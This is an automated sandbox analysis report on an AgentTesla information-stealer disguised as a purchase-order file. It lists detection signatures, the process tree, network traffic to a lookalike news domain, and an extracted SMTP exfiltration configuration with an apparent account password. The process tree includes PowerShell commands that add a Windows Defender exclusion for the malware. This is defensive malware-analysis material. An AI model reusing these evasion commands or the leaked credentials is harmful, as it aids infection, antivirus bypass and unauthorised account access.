Analysis Report 08042021New-PurchaseOrder.bat

Overview

General Information

Sample Name: 08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
Analysis ID: 383917
MD5: 27233176a2a979195b01a53ec16c7631
SHA1: 0ef424d2000f18e6b83473535bf85d22ed9ab79b
SHA256: 397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
Tags: AgentTesla, bat, Yahoo

Detection

AgentTesla
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w10x64
  • 08042021New-PurchaseOrder.exe (PID: 4952 cmdline: 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 4436 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5744 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 5828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3636 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1928 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6284 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • SWqTT.exe (PID: 3064 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 5204 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5304 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • SWqTT.exe (PID: 5192 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 7116 cmdline: 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: SWqTT.exe PID: 3064 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
32.2.SWqTT.exe.64915d0.5.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
32.2.SWqTT.exe.64915d0.5.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 32.2.SWqTT.exe.64915d0.5.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | ReversingLabs: Detection: 14%
Multi AV Scanner detection for submitted file
Source: 08042021New-PurchaseOrder.exe | ReversingLabs: Detection: 14%
Source: unknown | HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.3:49704 version: TLS 1.0
Source: 08042021New-PurchaseOrder.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: System.Core.ni.pdbRSDSD source: WER3A64.tmp.dmp.20.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.dr
Source: Binary string: System.Xml.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Core.pdbZ source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Configuration.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32# source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
Source: Binary string: jVisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: System.Configuration.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb-Q source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
Source: Binary string: System.Xml.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Core.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: O.pdb4( source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: mscorlib.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb5t source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp
Source: Binary string: System.Drawing.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Drawing.pdb9 source: WER3A64.tmp.dmp.20.dr
Source: Binary string: mscorlib.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: ww08042021New-PurchaseOrder.PDB source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Core.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32 source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
Source: Binary string: System.Xml.pdbD source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Windows.Forms.pdb04lk source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Xml.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Source: Joe Sandbox View | IP Address: 172.67.150.212
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a 
href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                      Source: unknown
                      DNS traffic detected: queries for: myliverpoolnews.cf
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: 08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBB01_2_00A2CBB0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A244E01_2_00A244E0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A24C581_2_00A24C58
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBA01_2_00A2CBA0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA97032_2_010DA970
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D28B832_2_010D28B8
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D22D032_2_010D22D0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA96B32_2_010DA96B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: invalid certificate
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilename vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.306148340.0000000007CA8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHcAj CBJ.exe2 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000000.202307233.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.293666584.00000000044C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288756404.0000000000CB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302392796.0000000006580000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.298745128.0000000005590000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288723697.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000011.00000000.276780249.0000000000FA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32
                      Source: classification engineClassification label: mal96.troj.evad.winEXE@35/25@2/2
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,5_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,6_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,5_2_004095FD
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,5_2_0040A33B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_00401306
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4952
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
